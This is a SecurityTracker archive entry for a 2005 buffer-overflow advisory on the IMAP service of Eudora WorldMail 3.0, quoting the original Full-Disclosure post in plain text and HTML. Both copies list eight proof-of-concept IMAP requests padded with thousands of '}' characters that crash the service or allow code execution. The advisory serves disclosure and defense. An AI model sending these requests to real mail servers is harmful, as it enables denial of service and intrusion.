SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   Eudora WorldMail Server Vendors:   Qualcomm
Eudora WorldMail Server Buffer Overflow in Processing IMAP Commands Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015391
SecurityTracker URL:  http://securitytracker.com/id/1015391
CVE Reference:   CVE-2005-4267   (Links to External Site)
Updated:  Dec 21 2005
Original Entry Date:  Dec 20 2005
Impact:   Execution of arbitrary code via network, Root access via network

Version(s): 3.0 (IMAPd Service 6.1.19.0 and possibly others)
Description:   A vulnerability was reported in Eudora WorldMail Server. A remote user can execute arbitrary code on the target system.

A remote user can send a specially crafted IMAP command to trigger a buffer overflow and cause the target service to crash or execute arbitrary code.

Some demonstration exploit requests are provided:

IMAP REQUEST: '02 LIST ""' + '}'x 5000
IMAP REQUEST: '03 LSUB ""' + '}'x 32762
IMAP REQUEST: '04 SEARCH TEXT ' + '}'x32762
IMAP REQUEST: '05 STATUS INBOX ' + '}'x32764
IMAP REQUEST: '02 AUTHENTICATE ' + '}'x32768
IMAP REQUEST: '02 FETCH 2:4 ' + '}'x10000
IMAP REQUEST: '02 SELECT ' + '}'x10000
IMAP REQUEST: '02 COPY 2:4 ' + '}'x32765

The vulnerability was reported by Tim Shelton.

The vendor was notified on December 1, 2005.

iDEFENSE reported the same vulnerability, with the advisory available at:

http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359

Impact:   A remote user can execute arbitrary code on the target system with System level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.eudora.com/worldmail/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] [ACSSEC-2005-11-27-0x1] Eudora Qualcomm WorldMail

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--===============0813056680==
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C60547.D09B3AAE"

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C60547.D09B3AAE
Content-Type: text/plain


-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Buffer Overflow

ID:       ACSSEC-2005-11-27 - 0x1

Class:    Buffer Overflow
Package:  Eudora Qualcomm WorldMail 3.0 IMAP4 Service 6.1.19.0
Build:    Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 21, 2005

Remote:   Yes
Severity: Medium

Credit:   Tim Shelton	        <security-advisories@acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Background

WorldMail 3 email and messaging server for small to large 
enterprises combines the features needed for today's cluttered 
email environment. WorldMail 3 combines the latest security 
tools required to stop abuse, spam, viruses and 
Directory Harvest Attacks (DHA). Other features include; a 
web-based email client, multi-level administration privileges 
and tools for migrating from WorldMail 2, OpenWave Post.Office, 
Ipswitch iMail and others.


-=[ Technical Description

Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 (and possibly others)
is vulnerable to a buffer overflow via a specially crafted IMAP requests. 
A remote attacker could issue the vulnerable command followed by malicious
code to execute arbitrary code or lead to a denial of service.


-=[ Proof of Concepts

IMAP REQUEST: '02 LIST ""' + '}'x 5000
IMAP REQUEST: '03 LSUB ""' + '}'x 32762
IMAP REQUEST: '04 SEARCH TEXT ' + '}'x32762
IMAP REQUEST: '05 STATUS INBOX ' + '}'x32764
IMAP REQUEST: '02 AUTHENTICATE ' + '}'x32768
IMAP REQUEST: '02 FETCH 2:4 ' + '}'x10000
IMAP REQUEST: '02 SELECT ' + '}'x10000
IMAP REQUEST: '02 COPY 2:4 ' + '}'x32765

-=[ Solution
No remedy available as of December 2005.

-=[ Credits

Vulnerability originally reported by Tim Shelton


-=[ Similar References

http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities

-=[ ChangeLog

2005-11-27 : Original Advisory
2005-12-01 : Vendor Notified
2005-12-20 : No response from vendor, disclosing full information.

------_=_NextPart_001_01C60547.D09B3AAE
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Dus-ascii">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
5.5.2657.88">
<TITLE>[ACSSEC-2005-11-27-0x1] Eudora Qualcomm WorldMail 3.0 IMAP4 =
Service 6.1.19.0</TITLE>
</HEAD>
<BODY>
<BR>

<P><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
<BR><FONT SIZE=3D2>ACS Security Assessment Advisory - Buffer =
Overflow</FONT>
</P>

<P><FONT SIZE=3D2>ID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
ACSSEC-2005-11-27 - 0x1</FONT>
</P>

<P><FONT SIZE=3D2>Class:&nbsp;&nbsp;&nbsp; Buffer Overflow</FONT>
<BR><FONT SIZE=3D2>Package:&nbsp; Eudora Qualcomm WorldMail 3.0 IMAP4 =
Service 6.1.19.0</FONT>
<BR><FONT SIZE=3D2>Build:&nbsp;&nbsp;&nbsp; Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=3D2>Notified: Dec 01, 2005</FONT>
<BR><FONT SIZE=3D2>Released: Dec 21, 2005</FONT>
</P>

<P><FONT SIZE=3D2>Remote:&nbsp;&nbsp; Yes</FONT>
<BR><FONT SIZE=3D2>Severity: Medium</FONT>
</P>

<P><FONT SIZE=3D2>Credit:&nbsp;&nbsp; Tim Shelton&nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
&lt;security-advisories@acs-inc.com&gt;</FONT>
<BR><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
</P>

<P><FONT SIZE=3D2>-=3D[ Background</FONT>
</P>

<P><FONT SIZE=3D2>WorldMail 3 email and messaging server for small to =
large </FONT>
<BR><FONT SIZE=3D2>enterprises combines the features needed for today's =
cluttered </FONT>
<BR><FONT SIZE=3D2>email environment. WorldMail 3 combines the latest =
security </FONT>
<BR><FONT SIZE=3D2>tools required to stop abuse, spam, viruses and =
</FONT>
<BR><FONT SIZE=3D2>Directory Harvest Attacks (DHA). Other features =
include; a </FONT>
<BR><FONT SIZE=3D2>web-based email client, multi-level administration =
privileges </FONT>
<BR><FONT SIZE=3D2>and tools for migrating from WorldMail 2, OpenWave =
Post.Office, </FONT>
<BR><FONT SIZE=3D2>Ipswitch iMail and others.</FONT>
</P>
<BR>

<P><FONT SIZE=3D2>-=3D[ Technical Description</FONT>
</P>

<P><FONT SIZE=3D2>Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 =
(and possibly others) is vulnerable to a buffer overflow via a =
specially crafted IMAP requests. </FONT></P>

<P><FONT SIZE=3D2>A remote attacker could issue the vulnerable command =
followed by malicious code to execute arbitrary code or lead to a =
denial of service.</FONT></P>
<BR>

<P><FONT SIZE=3D2>-=3D[ Proof of Concepts</FONT>
</P>

<P><FONT SIZE=3D2>IMAP REQUEST: '02 LIST &quot;&quot;' + '}'x =
5000</FONT>
<BR><FONT SIZE=3D2>IMAP REQUEST: '03 LSUB &quot;&quot;' + '}'x =
32762</FONT>
<BR><FONT SIZE=3D2>IMAP REQUEST: '04 SEARCH TEXT ' + '}'x32762</FONT>
<BR><FONT SIZE=3D2>IMAP REQUEST: '05 STATUS INBOX ' + '}'x32764</FONT>
<BR><FONT SIZE=3D2>IMAP REQUEST: '02 AUTHENTICATE ' + '}'x32768</FONT>
<BR><FONT SIZE=3D2>IMAP REQUEST: '02 FETCH 2:4 ' + '}'x10000</FONT>
<BR><FONT SIZE=3D2>IMAP REQUEST: '02 SELECT ' + '}'x10000</FONT>
<BR><FONT SIZE=3D2>IMAP REQUEST: '02 COPY 2:4 ' + '}'x32765</FONT>
</P>

<P><FONT SIZE=3D2>-=3D[ Solution</FONT>
<BR><FONT SIZE=3D2>No remedy available as of December 2005.</FONT>
</P>

<P><FONT SIZE=3D2>-=3D[ Credits</FONT>
</P>

<P><FONT SIZE=3D2>Vulnerability originally reported by Tim =
Shelton</FONT>
</P>
<BR>

<P><FONT SIZE=3D2>-=3D[ Similar References</FONT>
</P>

<P><FONT SIZE=3D2><A =
HREF=3D"http://www.idefense.com/application/poi/display?id=3D341&type=3D=
vulnerabilities" =
TARGET=3D"_blank">http://www.idefense.com/application/poi/display?id=3D3=
41&type=3Dvulnerabilities</A></FONT>
</P>

<P><FONT SIZE=3D2>-=3D[ ChangeLog</FONT>
</P>

<P><FONT SIZE=3D2>2005-11-27 : Original Advisory</FONT>
<BR><FONT SIZE=3D2>2005-12-01 : Vendor Notified</FONT>
<BR><FONT SIZE=3D2>2005-12-20 : No response from vendor, disclosing =
full information.</FONT>
</P>

</BODY>
</HTML>
------_=_NextPart_001_01C60547.D09B3AAE--

--===============0813056680==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============0813056680==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC